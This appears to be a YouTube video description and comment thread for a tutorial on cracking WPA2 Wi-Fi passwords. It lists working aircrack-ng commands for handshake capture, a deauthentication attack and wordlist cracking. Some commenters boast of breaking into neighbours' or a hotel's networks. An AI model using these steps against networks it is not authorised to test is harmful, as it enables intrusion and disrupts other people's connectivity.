Menu: Use airmon-ng to crack WiFi networks: 0:00 Network Adapter to use: 0:46 Kali Linux setup: 1:20 Plug in network adapter: 1:35 Verify that network adapter is recognized by Kali Linux: 2:04 WPA2 network to crack: 2:43 iwconfig: 3:27 Kali Version: 3:34 Kill conflicting processes with airmon-ng: 3:55 Put interface into monitor mode: 4:32 Discover WiFi Networks with airodump-ng: 5:15 Use airodump-ng to view only one network: 6:20 Connect to network using an iPhone: 6:39 airodump-ng capture WPA2 four way handshake: 6:58 Use aireplay-ng to deauthenticate clients: 7:25 WPA2 four way handshake captured: 8:08 Use Wireshark to view WPA2 four way handshake: 8:38 Put interface back into managed mode: 9:30 Crack WPA2 password with aircrack-ng: 10:10 Password cracked: 11:00 WiFi router WPA2 settings: 12:00 Summary: 12:40 ================ Network Adapters: ================ Alfa AWUS036NHA: amzn.to/3qbQGKN Alfa AWUSO36NH: amzn.to/3moeQiI ================ Commands used: ================ ! See version of Kali cat /etc/os-release uname -a ! See interfaces ip addr iwconfig !kill processes sudo airmon-ng check kill !Start monitor mode sudo airmon-ng start wlan0 !Verify that monitor mode is used sudo airmon-ng !You could also use iwconfig to check that interface is in monitor mode: iwconfig ! Get the AP's MAC address and channel sudo airodump-ng wlan0mon ! AP-MAC & channel - you need to select your own here: ESSID: 90:9A:4A:B8:F3:FB Channel used by AP for SSID: 2 !1st Window: !Make sure you replace the channel number and bssid with your own !Replace hack1 with your file name like capture1 or something sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon !2nd Window - deauth attack !Make sure you replace the bssid with your own sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon !Use Wireshark to open hack file wireshark hack1-01.cap !Filter Wireshark messages for EAPOL eapol !Stop monitor mode airmon-ng stop wlan0mon !Crack file with Rock you or another wordlist !Make sure you have rockyou in text format (unzip file on Kali) !Replace hack1-01.cap with your file name aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt ================ Previous videos: ================ Kali Installation: ua-cam.com/video/VAMP8DqSDjg/v-deo.html WPA2 GPU password cracking: ua-cam.com/video/J8A8rKFZW-M/v-deo.html Wordlists (rockyou): ua-cam.com/video/rgWcguAg-XA/v-deo.html ================ Connect with me: ================ Discord: discord.com/invite/usKSyzb Twitter: twitter.com/davidbombal Instagram: instagram.com/davidbombal LinkedIn: www.linkedin.com/in/davidbombal Facebook: facebook.com/davidbombal.co TikTok: tiktok.com/@davidbombal UA-cam: ua-cam.com/users/davidbombal ================ Support me: ================ Buy my CCNA course and support me: DavidBombal.com: CCNA ($10): bit.ly/yt999ccna Udemy CCNA Course: bit.ly/ccnafor10dollars GNS3 CCNA Course: CCNA ($10): bit.ly/gns3ccna10 ====================== Special Offers: ====================== Boson software: 15% discount Link: bit.ly/boson15 Code: DBAF15P Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
You way to explain is very good ,please keep it up... Please make some video on windows admin password bypass or hacking or email account hacking ..Thanks
your teaching thieves or want to be thieves! the man pages for aircrack-ng and others in the suite is more than enough information or tutorial for any ethical use! fortunately the reality of wpa2 with 1x8^120 to 1x64^120 possibilities and roughly a 3000 keys per second with descent hardware a 100 to 10000 year run is unpractical. collecting ssid and handshakes and mac addresses is easy dose not even require linux or monitor mode but brute forcing any strong password over 14 chars long is not going to happen , you should examine your ethics sir because your audience isnt going to set up a pertest lab or ask permission of a network owner no matter how many times you ask them not to! anyone with any true interest in pen testing will have enough system and network admin knowledge to be functional with a man page nor would they require the detailed explanations you give on basic principals. hopefully no one you care about becomes a victim of someone you taught
Hey, I've followed this tutorial and for some reason my deauth attack isn't working. I've even tried mdk4 and it's just not kicking me from the network and not capturing the handshake. I've looked all over the internet for a solution but have yet to find one. So now I ask you! David Bombal community, if you are here then you are most likely highly intelligent. How about sharing some knowledge with your boy
@@itsme7570 you followed the tutorial and its not working....... do you understand what you are doing? its a signal strength issue...you have one radio connected to another and a third is trying to say louder no not that radio this one.....but it isnt louder than the first radio so you get squat....now why are you trying to learn how to steal?
After watching first video in your channel, It took only 2 minutes to decide weather i want to subscribe your channel or not. Love this. Such an awesome presentation. ♥
Hey! Mr. David Bombal, thanks a million. I am from Tijuana, Mexico, I am 53, and I just get this "KALI LINUX" os, with knowing nothing what so ever about this LINUX SYSTEM. So, as you can imagine, I've whatched so many video tutorials, and well, I'm a little confused with all this commands, and passwords, but I'm doing a little progres in understanding the basics. And let me tell you, that until I watched your video here, I finally get to run the tools in the AIRCRACK-NG SUITE. The way you exp;ain step by step, it"s so clear, THAT EVEN ME GET TO UNDERSTAND WHAT TO DO, AND WHAT EXACTLY IS THE PROGRAM DOING WITH EACH ONE OF THE COMMANDS. THANK YOU SIR. I hope that my written engish is not so bad, and you get may gratitude.
I am computer consultant 1991 Melbourne Fl . Degree in electric engineering major computer input -output I did make living recovering , braking password , Old days 500 dollars maybe 1 hours ? Upset employees password all network and quit many times . . I really thanks You David deep from my heart for educating young people ... We needed that in America ...
Just if somebody is having issues with VM, I was not able to find any SSIDs until I changed my VM network configuration. I changed to Bridge and it worked. I am still new on this and I will keep doing research. Thanks David for all the good work here!
hey your comment is 2 years old i did what you said but i still don't see any ssids should i set the Promiscuous Mode to Allow VMs vs Allow All? please help
I must say that you are indeed an excellent teacher. You did not explain what to do after I have the HANDSHAKE I'll be glad to hear from you. Thank you very much.
Such a clear and well communicated lesson definitely will be watching more of your videos and looking at your courses, thank you for this great lesson David!
2:50 "Here I have a TP-link router, which I've purchased" Yes, Mr Bombal, we believe you! That's my way of hacking WiFis by stealing the whole network adapter 😂
Great video. I'm 55 years old and just starting my path. I have always loved technology. My parents would drop me at radio shack and I would play on the old tandy's for hours. I learned alot from this video and it helped me to make more sense of things. Thanks for sharing.
I Love your setup and the blue back light, your way of explaining things is very easy to understand, you should consider teaching a CEH course online or in Udemy Thank You Sir Mad Respect 🙏🏼
Just a heads up, the router ESSID names you have redacted are visible for a brief period of time between timestamp 6:49 and 6:50. Also, thank you for the video! Very informative and simplified.
Deven I think you miss the point for those that will use it for malicious intentions like noobs and the likes of he has give a demonstration of the very thing and precise education on how to he might as well have done now giving as incompetent it be presenting yourself to be a cyber security specialist it’s a bit of irony don’t you think of teaching people how to crack a WiFi network what’s it for other cyber security analysts that would already have taught that it college or perhaps anywhere else that give a recognised certificate in giving you implement security against such things what’s is it for a reminder on how to do it right or perhaps a procedure just in case you checking for vulnerability’s or the strength of the key the point is Deven that he is showing the world as in how to crack a network illegally on a public platform which I think you missed wither he is using it for black hat or not or he considers himself white he has give a class on how break into a WiFi network why not teach as it’s presented how to stop such attacks as in a class on ips or ids with maybe how to compile a firewall like P-fense highlighted comment well if someone breaks into my network i will tell the government it’s cyber analyst taught them how and hold them to account the fucking irony he’s not using it for black-hat he might as well.
Excelente video, thank you so much, I saw many blogs and they didn't explain as good as you. I thought I wouldn't find videos like this in UA-cam jajaja.
Something I'd recommend if you are using kali in a live environment (i.e. it isn't your main system you are doing anything on) is to sudo su so you don't have to type sudo before every command. Especially useful when you are learning.
yeah make sure it's not your main system LOL I don't want to think about how much data has been lost to people not realizing they're superuser and rm rf ing their whole file system
At the 5:15 mark.. its good to type the letter "S" until it says SORTING BY POWER LEVEL.. this way it will show strongest signals at the top and down the list the strongest to weakest signal from top to bottom will display
My lenovo laptop has intel wireless adapter with monitor capablity. Installed kali linux on usb drive and cracked the password. Great tutorial. Thanks.
Can you please help me? Iam in the same situation as you with a rtl8723be that let's me get it into monitor mode and all.. I installed live Kali Linux on my USB drive and tried to crack wifi with it but ah I just cant get the password at the last moment.. it always shows "key not found" And most of the time I can't even get the Wpa handshake while doing the de-auth thing
Thanks for the great content! I've done some of this in Virtual Box. I did notice that VMs can be picky about the brand or version of wi-fi devices. Some better than others. Looking forward to duplicating this video in my lab environment. :-)
its the adapters chipset some do not support instructions given in airx-ng ,,and vms in general have issues with internal hardware and ownership so usb adapters sidestep that issue
@@mobiousenigmaI am using kali in a virtual box but it won't show me the wireless network as it reads that network as an internal network and shows it as a wired network (eth0) instead. How to fix it?
Hi David, Easy to follow your steps. But how to go about if the AP (WPA2 CCMP PSK) does not bring out a EAPoL? Do I just have to try to go with Hashcat instead? This would eliminate Wireshark as well? Thank You Georg
A great video we went over this in class I had notes to the best of the circumstances lectures happen fast. This helped me fill in the holes. Great video. Thank you!
At 4:58 I successfully changed to Monitor mode, but the name of the connection is still "wlan0". I tried it as a root user as well. I can't follow the next steps, because I can't see connections. What do you think what should I do to be able to witch it to "wlan0mon" properly? Any idea what should I change or fix? Thanks.
i tested this thing when i was in school on my second router information wasn't available like that at that time it was my passion to learn new stuff but now life has changed so much I don't even have the time to play games or watch tv
lesson of the day "The best way to predict the future is to create it." Thanks a lot for creating this video i really enjoyed watching it and yeah you have a new subscriber.
Hi David, you seem to be a cut above the other UA-cam presenters in this subject. I suspected you might be a professional presenter, and it looks like you are... QUESTION: do you have a course or series of courses that would get me to a stage where I could sit for the Cisco CCNA exams with a reasonable expectation of passing them? Then maybe the CCNA Security specialties? Money no object my company will pay...
Hi, If you capture more than 1 handshake, let's say you capture 9 handshakes, how can you reduce the number of handshakes in the cap file to make the cracking less redundant?
Hello sir. I hv seen lots n lots video different kind of tutorials. But the ur way of explanation. It really outstanding. It's very feel us easy even hard concept
You will not getting the handshake if there was no known device try to connect to the network. You need to wait until a known device connecting to the target wifi. It consumes time.
When I put my card in monitor mode and remove it from monitor mode with the airmon-ng commands , iw dev still shows it in monitor mode. Also airmon-ng doesn't rename it to wlan0mon, it stays at wlan0, but monitor mode works.
Good video but I think this is still brute forcing and will not work against a good password. I think the most effective attack on WPA2 is Fluxion and I wish David would demonstrate Fluxion so people will recognise it and not fall for it (like I did)
this helped me find so many flaws in my network setup. THANK YOU for this educational video, this kind of attack is very common in my area and I can now make it difficult for CTRL+V script kids to scan/connect my network.
Hi David. I finally received my Alpha Wi-Fi Adaptor (YESSSS !!) and ready to explore with you. One thing I noticed (at timing 5:45) is that I receive a bunch of ESSID with name . In fact, I have LOTS of them, almost twice the amount of « valid » ESSIDs. Any idea why ? It fills my screen to a point where I can not see the bottom part, where I can see the Stations. Oh! I use Kali on an old PC I repurposed just for this OS. Is that what they call « Bare-Metal » .. or « Hard-Metal » ? Not using VM on Windows for this one. Thank you for your input on that small problem. I hope to read from you soon, for I'm stuck ! Have a great day ! I love your videos.
Very nice info, there's still no better way to crack WPA2.... only if the WPS is active. Which version kali are you using? And that terminal looks so clean! very nice set up!
I have done everthing as explained at min 1:35 however Kali does not recognize the Alfa network adapter. The "iwconfig" command shows "no wireless extensions". The Alfa is connected via USB and showing a blue blinking LED. I am running Kali under Windows 10 with a VM Box. Under Windows 10 the Alfa adapter would not find the suitable driver and it appeared as "UB91C" in the systems property menu. Any ideas?
Hi David, at 4:55, I was unable to change the interface name from wlan0 to wlan0mon despite following the previous steps. Any thoughts as to why? The adapter I'm using is the Alfa AWUS 1900. Thanks!
After a long time I found a suitable video. Thanks man. And I also wanna request that will you please upload videos on teaching c++, http and other programming languages.
Great training video learnt a lot, had a few issues along the way that were resolved and my understanding is much better, hope i can start to remember some commands there is so much syntax is Linux.
Thank you for the lesson, finaly learned how to use aireplay and etc, doing all this lesson steps via a rapsberrypi 3b+ , in the end it takes about 8 hours or more to crack the password, if aircrack can do it, probably better to store the .cap file in a usb drive and crack it using my main pc to see the results (do this on your own network, deauth will make the network unusable while running, so probably your neighbor that makes a lot of noise will notice it)
I will never think in attacking any network bu mine, pinky promess... keep creating awesome content! my (neigh..) own wifi network needs to be cracked!
i have to tell you that you are great..this is the best channel i have ever seen ,and you have a talent in explaination..i would like to thank you,,and i hope some lessons about data recovery..please.
ada banyak masalah sebenarnya menggunakan aircrack-ng tapi slama saya ini aircrack sangat efektif dibanding yang lain..itu tergantung anda membuat daftar sandi dan perangkat yang anda pakai..dan terkahir seberapa kuat anda mengoprasikan aircrack..the best tools
Menu:
Use airmon-ng to crack WiFi networks: 0:00
Network Adapter to use: 0:46
Kali Linux setup: 1:20
Plug in network adapter: 1:35
Verify that network adapter is recognized by Kali Linux: 2:04
WPA2 network to crack: 2:43
iwconfig: 3:27
Kali Version: 3:34
Kill conflicting processes with airmon-ng: 3:55
Put interface into monitor mode: 4:32
Discover WiFi Networks with airodump-ng: 5:15
Use airodump-ng to view only one network: 6:20
Connect to network using an iPhone: 6:39
airodump-ng capture WPA2 four way handshake: 6:58
Use aireplay-ng to deauthenticate clients: 7:25
WPA2 four way handshake captured: 8:08
Use Wireshark to view WPA2 four way handshake: 8:38
Put interface back into managed mode: 9:30
Crack WPA2 password with aircrack-ng: 10:10
Password cracked: 11:00
WiFi router WPA2 settings: 12:00
Summary: 12:40
================
Network Adapters:
================
Alfa AWUS036NHA: amzn.to/3qbQGKN
Alfa AWUSO36NH: amzn.to/3moeQiI
================
Commands used:
================
! See version of Kali
cat /etc/os-release
uname -a
! See interfaces
ip addr
iwconfig
!kill processes
sudo airmon-ng check kill
!Start monitor mode
sudo airmon-ng start wlan0
!Verify that monitor mode is used
sudo airmon-ng
!You could also use iwconfig to check that interface is in monitor mode:
iwconfig
! Get the AP's MAC address and channel
sudo airodump-ng wlan0mon
! AP-MAC & channel - you need to select your own here:
ESSID: 90:9A:4A:B8:F3:FB
Channel used by AP for SSID: 2
!1st Window:
!Make sure you replace the channel number and bssid with your own
!Replace hack1 with your file name like capture1 or something
sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon
!2nd Window - deauth attack
!Make sure you replace the bssid with your own
sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon
!Use Wireshark to open hack file
wireshark hack1-01.cap
!Filter Wireshark messages for EAPOL
eapol
!Stop monitor mode
airmon-ng stop wlan0mon
!Crack file with Rock you or another wordlist
!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack1-01.cap with your file name
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
================
Previous videos:
================
Kali Installation: ua-cam.com/video/VAMP8DqSDjg/v-deo.html
WPA2 GPU password cracking: ua-cam.com/video/J8A8rKFZW-M/v-deo.html
Wordlists (rockyou): ua-cam.com/video/rgWcguAg-XA/v-deo.html
================
Connect with me:
================
Discord: discord.com/invite/usKSyzb
Twitter: twitter.com/davidbombal
Instagram: instagram.com/davidbombal
LinkedIn: www.linkedin.com/in/davidbombal
Facebook: facebook.com/davidbombal.co
TikTok: tiktok.com/@davidbombal
UA-cam: ua-cam.com/users/davidbombal
================
Support me:
================
Buy my CCNA course and support me:
DavidBombal.com: CCNA ($10): bit.ly/yt999ccna
Udemy CCNA Course: bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): bit.ly/gns3ccna10
======================
Special Offers:
======================
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
You way to explain is very good ,please keep it up... Please make some video on windows admin password bypass or hacking or email account hacking ..Thanks
please hack my neighbors wifi
your teaching thieves or want to be thieves! the man pages for aircrack-ng and others in the suite is more than enough information or tutorial for any ethical use! fortunately the reality of wpa2 with 1x8^120 to 1x64^120 possibilities and roughly a 3000 keys per second with descent hardware a 100 to 10000 year run is unpractical. collecting ssid and handshakes and mac addresses is easy dose not even require linux or monitor mode but brute forcing any strong password over 14 chars long is not going to happen , you should examine your ethics sir because your audience isnt going to set up a pertest lab or ask permission of a network owner no matter how many times you ask them not to! anyone with any true interest in pen testing will have enough system and network admin knowledge to be functional with a man page nor would they require the detailed explanations you give on basic principals. hopefully no one you care about becomes a victim of someone you taught
Hey, I've followed this tutorial and for some reason my deauth attack isn't working. I've even tried mdk4 and it's just not kicking me from the network and not capturing the handshake. I've looked all over the internet for a solution but have yet to find one. So now I ask you! David Bombal community, if you are here then you are most likely highly intelligent. How about sharing some knowledge with your boy
@@itsme7570 you followed the tutorial and its not working....... do you understand what you are doing? its a signal strength issue...you have one radio connected to another and a third is trying to say louder no not that radio this one.....but it isnt louder than the first radio so you get squat....now why are you trying to learn how to steal?
After watching first video in your channel, It took only 2 minutes to decide weather i want to subscribe your channel or not. Love this. Such an awesome presentation. ♥
Does WiFi hacking damage the phone's battery?
Is there a virus that can damage the battery through Wi-Fi?
Hey! Mr. David Bombal, thanks a million. I am from Tijuana, Mexico, I am 53, and I just get this "KALI LINUX" os, with knowing nothing what so ever about this LINUX SYSTEM. So, as you can imagine, I've whatched so many video tutorials, and well, I'm a little confused with all this commands, and passwords, but I'm doing a little progres in understanding the basics. And let me tell you, that until I watched your video here, I finally get to run the tools in the AIRCRACK-NG SUITE. The way you exp;ain step by step, it"s so clear, THAT EVEN ME GET TO UNDERSTAND WHAT TO DO, AND WHAT EXACTLY IS THE PROGRAM DOING WITH EACH ONE OF THE COMMANDS. THANK YOU SIR. I hope that my written engish is not so bad, and you get may gratitude.
We all heard you. God bless you my friend.
I am computer consultant 1991 Melbourne Fl . Degree in electric engineering major computer input -output
I did make living recovering , braking password , Old days 500 dollars maybe 1 hours ?
Upset employees password all network and quit many times . . I really thanks You David deep from my heart for educating young people ... We needed that in America ...
I am 56 and you make this all so interesting and easy. I love what you do and cant thank you enough for educating me.
David: only attack networks that *you own*
Me: well, i basically "own" the network after im in- *gets sent to gulag*
Lol🤣🤣
LOOOOL BWAHAHAH
hahaha
loled so hard, because I understand.
Just if somebody is having issues with VM, I was not able to find any SSIDs until I changed my VM network configuration. I changed to Bridge and it worked. I am still new on this and I will keep doing research. Thanks David for all the good work here!
hey your comment is 2 years old i did what you said but i still don't see any ssids should i set the Promiscuous Mode to Allow VMs vs Allow All? please help
Ah, finally, I found a proper way to learn about network security.
Such a great format, you make it seem so simple ❤️👍
hello
@@pasihiltunen4041 hi
I followed a lot of tutorials but none worked but this worked for me thanks men i appreciate it ❤❤
You are my favorite. You talk so clearly and demonstrate in clean way.
I must say that you are indeed an excellent teacher.
You did not explain what to do after I have the HANDSHAKE
I'll be glad to hear from you.
Thank you very much.
He said you can crack it
Just look it up.
This for me is the best presented shows on YT its given me so much pleasure and being retired keeps me busy lerning thank you sir.
I know many people have told you What I am about to tell you.
You are the best!👍😎
Brilliantly made video as we've all come to expect from you, David.
Really invigorates the motivation to keep at it.
Keep it up!
Thank you!
@@davidbombal sir plz make video on how to create backdoor through wifi🙏
@@Manishkumar-dj6kl that's sound mighty like malicious intent
backtrack was my introduction to Linux / cybersecurity back in 2008. So glad that I kept digging at it, best decision ever
Such a clear and well communicated lesson definitely will be watching more of your videos and looking at your courses, thank you for this great lesson David!
Thank you Bryce!
hi please make a full video about evil twin attack
@@davidbombal
Thanks for the tutorial. Been using my neighbor's wifi for 3 months now. It only took my Pi 30 minutes to crack the password 👍👍
Loll what 😭😭
2:50 "Here I have a TP-link router, which I've purchased" Yes, Mr Bombal, we believe you!
That's my way of hacking WiFis by stealing the whole network adapter 😂
lol... great comment. Yes, easier to just take the whole device. Got to demonstrate that I'm using my own devices so I don't get into trouble.
LOL
@@davidbombal I am a beginner but I want to study Ethical hacking please anyone help me what to learn and from where????
For the routers o módems Tp link and Belkin is easy to hack ? Mr Bombal ? In Windows is posible ? Or only in kali Linux ?
@@mariab0209 esc que je alle a toulitet
Great video. I'm 55 years old and just starting my path. I have always loved technology. My parents would drop me at radio shack and I would play on the old tandy's for hours. I learned alot from this video and it helped me to make more sense of things. Thanks for sharing.
You got it!!
I Love your setup and the blue back light, your way of explaining things is very easy to understand, you should consider teaching a CEH course online or in Udemy
Thank You Sir Mad Respect 🙏🏼
He teaches on Udemy too, amazing teacher. courses are free on youtube but for people that can afford they can support him on Udemy
u b naija boss man
Loved it! It's 5:30 in the morning and I had a great time doing this:)
Just a heads up, the router ESSID names you have redacted are visible for a brief period of time between timestamp 6:49 and 6:50. Also, thank you for the video! Very informative and simplified.
idk why but after doing airodump-ng i dont discover any wifi
Hey, try airmon-ng check kill
Make sure your network adapter supports monitor mode and packet injection.
@@khalidnoor2556btw did you figure it out? cos even I'm facing the same issue here
@@SilverWolf-rz4bqdid u figure out
I think I just found a gem YT channel, thanks David for being an amazing guide.
Glad you enjoyed the video!
David, you have been killing it with hacking videos! Thank you Sir, you're a great teacher !
Thank you Andrew!
I get get locked up for it yet he gets a fucking superstardom even gets paid for it the fucking irony.
@@peterbefreebrothasandsista2465 because he’s not using it as a black hat hacker that’s why.
Deven I think you miss the point for those that will use it for malicious intentions like noobs and the likes of he has give a demonstration of the very thing and precise education on how to he might as well have done now giving as incompetent it be presenting yourself to be a cyber security specialist it’s a bit of irony don’t you think of teaching people how to crack a WiFi network what’s it for other cyber security analysts that would already have taught that it college or perhaps anywhere else that give a recognised certificate in giving you implement security against such things what’s is it for a reminder on how to do it right or perhaps a procedure just in case you checking for vulnerability’s or the strength of the key the point is Deven that he is showing the world as in how to crack a network illegally on a public platform which I think you missed wither he is using it for black hat or not or he considers himself white he has give a class on how break into a WiFi network why not teach as it’s presented how to stop such attacks as in a class on ips or ids with maybe how to compile a firewall like P-fense highlighted comment well if someone breaks into my network i will tell the government it’s cyber analyst taught them how and hold them to account the fucking irony he’s not using it for black-hat he might as well.
@@davidbombal what's the attack name and the protocol used ??????
Excelente video, thank you so much, I saw many blogs and they didn't explain as good as you.
I thought I wouldn't find videos like this in UA-cam jajaja.
Nice video Mr.David You are The Best Keep Going 👏👏👏👏👏
Thank you. I really appreciate that :)
it requires a huge practical knowledge and consistent practice to be like u :)
Something I'd recommend if you are using kali in a live environment (i.e. it isn't your main system you are doing anything on) is to sudo su so you don't have to type sudo before every command. Especially useful when you are learning.
yeah make sure it's not your main system LOL I don't want to think about how much data has been lost to people not realizing they're superuser and rm rf ing their whole file system
@@user-vk2cd9qw7i or in the case of Gitlab using it on the wrong system
Thank you, very straight forward. I like that. You talk about the vital things without nonsens. That is a real pro.
Very well explained. I'm starting in cybersecurity thanks to you! :)
Thank you Joel. That's fantastic!
hey thank u but there is a problem when I type sudo airman-ng its still on wlan0 not wlan0mon why???
At the 5:15 mark.. its good to type the letter "S" until it says SORTING BY POWER LEVEL.. this way it will show strongest signals at the top and down the list the strongest to weakest signal from top to bottom will display
Good Content Mr.David 👏👏👏👏👏👏
Thank you
"I have to say this or I get into trouble"
God that really got me, subscribed
Do u really think all the people are here for education purpose 😂🗿
Nah hes using it as a excuse.
Yep it's just for educational purposes😊
😊😏😎
😂😂😂
I am
thank you David! I just subbed, great videos! Much love from pentesting enthusiasts in India :D
while(True):
print("David sir is great")
True
David sir is great
Infinite compliments once one bro!🔥
My lenovo laptop has intel wireless adapter with monitor capablity. Installed kali linux on usb drive and cracked the password. Great tutorial. Thanks.
Can you please help me? Iam in the same situation as you with a rtl8723be that let's me get it into monitor mode and all.. I installed live Kali Linux on my USB drive and tried to crack wifi with it but ah I just cant get the password at the last moment.. it always shows "key not found"
And most of the time I can't even get the Wpa handshake while doing the de-auth thing
Thanks for the great content! I've done some of this in Virtual Box. I did notice that VMs can be picky about the brand or version of wi-fi devices. Some better than others. Looking forward to duplicating this video in my lab environment. :-)
its the adapters chipset some do not support instructions given in airx-ng ,,and vms in general have issues with internal hardware and ownership so usb adapters sidestep that issue
@@mobiousenigmaI am using kali in a virtual box but it won't show me the wireless network as it reads that network as an internal network and shows it as a wired network (eth0) instead. How to fix it?
@@harvindersingh4411 its not broken thats how virtual machines work. if you want wireless in a virtual desktop it needs to be usb.
@@mobiousenigma So that means I can't use the internal adapter as a wireless network in virtual box?
@@harvindersingh4411 dual boot
Clear tutorial, you gained a sub. Unsure why 318 folk disliked this
Hi David,
Easy to follow your steps. But how to go about if the AP (WPA2 CCMP PSK) does not bring out a EAPoL?
Do I just have to try to go with Hashcat instead? This would eliminate Wireshark as well?
Thank You Georg
A great video we went over this in class I had notes to the best of the circumstances lectures happen fast. This helped me fill in the holes. Great video. Thank you!
Hola.
Te quería agradecer por tu gran conocimiento aportado, me ha sido de mucha utilidad para manejar este sistema.
Cuidate y gracias ☺️👍
AMAZINGLY well put together, researched and shown. This helped me with a CTF I was doing.
This
Do you have classes? I'm grown but if my parents ever asked me who i wanted to be like when i grew up, i would say: David Bombal LOL
Hahahaha nice
Yes he does
I will say the same. He is my role model
Network Chuck
@@RandomVideosN.S.WAustralia yes he n Zaid Sabith ( Ireland) are great too.
this is by far the best tutorial and demonstration of airmon/aircrack.
That wordlist only really works if you live in a country where english is the main language though it seems
Damn you're really fucking smart you think of that on your own??
What should you use if english isnt the main language
I just saw this video and right away had to subscribe, absolute wonderful!! you make it look so simple, thank you so very much!
Keep it coming!!!! But please update your Udemy course with these Videos 😁
10:26 xD ah i remember now why I abandon this xD the brute force part.
Mil gracias amigo los subtitulos traducidos funcionan perfectamente y se te entiende muy bien.
At 4:58 I successfully changed to Monitor mode, but the name of the connection is still "wlan0". I tried it as a root user as well. I can't follow the next steps, because I can't see connections. What do you think what should I do to be able to witch it to "wlan0mon" properly? Any idea what should I change or fix? Thanks.
i tested this thing when i was in school on my second router information wasn't available like that at that time it was my passion to learn new stuff but now life has changed so much I don't even have the time to play games or watch tv
lesson of the day "The best way to predict the future is to create it."
Thanks a lot for creating this video i really enjoyed watching it and yeah you have a new subscriber.
Bruh you just copied another comment!
Great! Now I can mess with- uh I mean “demonstrate” my new skills to my friends!
nice , 8 hours and 40 minute time left. great tutorial
Hi David, you seem to be a cut above the other UA-cam presenters in this subject. I suspected you might be a professional presenter, and it looks like you are... QUESTION: do you have a course or series of courses that would get me to a stage where I could sit for the Cisco CCNA exams with a reasonable expectation of passing them? Then maybe the CCNA Security specialties? Money no object my company will pay...
just happen to have a TPLink WN722 layin around and doing test on my own network. tutorial works great. thank you
Hi,
If you capture more than 1 handshake, let's say you capture 9 handshakes, how can you reduce the number of handshakes in the cap file to make the cracking less redundant?
did you resolve this? i tried two cap files first one said denied access, cap2 file works
@@jeramiahclark9826hey why isn't airodump-ng showing any bssid?
How can I solve this problem?
Hello sir. I hv seen lots n lots video different kind of tutorials. But the ur way of explanation. It really outstanding. It's very feel us easy even hard concept
hey david... although i did all the steps correctly after the deauthentication i dont get a wpa handshake
.. pls help me through this
Same here bro didn't get the wpa handshake
You will not getting the handshake if there was no known device try to connect to the network. You need to wait until a known device connecting to the target wifi. It consumes time.
@@msubhietamam5720 ok got your point.
You make me to dive into again.
@@happygujjar7254 happy cracking then! 😊
Not me getting a cancer ad before trying to hack my neighbors Wi-Fi
😭😭😭
When I put my card in monitor mode and remove it from monitor mode with the airmon-ng commands , iw dev still shows it in monitor mode.
Also airmon-ng doesn't rename it to wlan0mon, it stays at wlan0, but monitor mode works.
did you find the solution to the problem? i have tl-wn725n, and i can't start wlan0mon :(
You have good contents as always... Always you are complete with the topic which you are streaming
Good video but I think this is still brute forcing and will not work against a good password.
I think the most effective attack on WPA2 is Fluxion and I wish David would demonstrate Fluxion so people will recognise it and not fall for it (like I did)
Agree all wifi passwords are nonstandard out of the box e.g. e7xjedhjd
this helped me find so many flaws in my network setup. THANK YOU for this educational video, this kind of attack is very common in my area and I can now make it difficult for CTRL+V script kids to scan/connect my network.
wpa handshake never get captured :(
You are awesome ❤❤. I have watched many of your videos❤❤
Nothing is working for me 😞
Me too
What's is the problem?
@@Mr.X-xyz My laptop logout automatically and the network which i connected is automatically disconnected
Thank You A Lot Mr.David, very helpful videos. Greetings From Milano, Italy :-D
You are welcome!
Hi David.
I finally received my Alpha Wi-Fi Adaptor (YESSSS !!) and ready to explore with you.
One thing I noticed (at timing 5:45) is that I receive a bunch of ESSID with name . In fact, I have LOTS of them, almost twice the amount of « valid » ESSIDs. Any idea why ? It fills my screen to a point where I can not see the bottom part, where I can see the Stations.
Oh! I use Kali on an old PC I repurposed just for this OS. Is that what they call « Bare-Metal » .. or « Hard-Metal » ? Not using VM on Windows for this one.
Thank you for your input on that small problem. I hope to read from you soon, for I'm stuck ! Have a great day ! I love your videos.
Subscriber : How many your ROUTER?
David : Yes
wonderful good work and very informative video on wifi cracking than other youtubers
It worked!, I owe you so much, thank you David. My best Regards!
Amazing! I'm new in learning ethical hacking, your videos are very helpful!
Very nice info, there's still no better way to crack WPA2.... only if the WPS is active. Which version kali are you using? And that terminal looks so clean! very nice set up!
Did this in college! Very good demo :)
Thank you very much ....this is my home .....I will forever rely on your videos
Ευχαριστώ για αυτό το υπέροχο μάθημα David!
Thanks sir for the information you explain each and every command which makes it easier to understand......
Love from India!
Well thanks to your tuto I've changed my Hotel GUEST wifi 1MB/s to Admin's WiFi with full speed
100% working. thank bro this was amazing to me wow, i just got some password to some wifi around lol thanks man
I have done everthing as explained at min 1:35 however Kali does not recognize the Alfa network adapter. The "iwconfig" command shows "no wireless extensions". The Alfa is connected via USB and showing a blue blinking LED. I am running Kali under Windows 10 with a VM Box. Under Windows 10 the Alfa adapter would not find the suitable driver and it appeared as "UB91C" in the systems property menu. Any ideas?
You are a legend in my friend group Mr.Bombal
Hi David,
at 4:55, I was unable to change the interface name from wlan0 to wlan0mon despite following the previous steps. Any thoughts as to why?
The adapter I'm using is the Alfa AWUS 1900. Thanks!
i have tl-wn725n, and i can't start wlan0mon :(
After a long time I found a suitable video. Thanks man. And I also wanna request that will you please upload videos on teaching c++, http and other programming languages.
Great training video learnt a lot, had a few issues along the way that were resolved and my understanding is much better, hope i can start to remember some commands there is so much syntax is Linux.
Thank you for the lesson, finaly learned how to use aireplay and etc, doing all this lesson steps via a rapsberrypi 3b+ , in the end it takes about 8 hours or more to crack the password, if aircrack can do it, probably better to store the .cap file in a usb drive and crack it using my main pc to see the results (do this on your own network, deauth will make the network unusable while running, so probably your neighbor that makes a lot of noise will notice it)
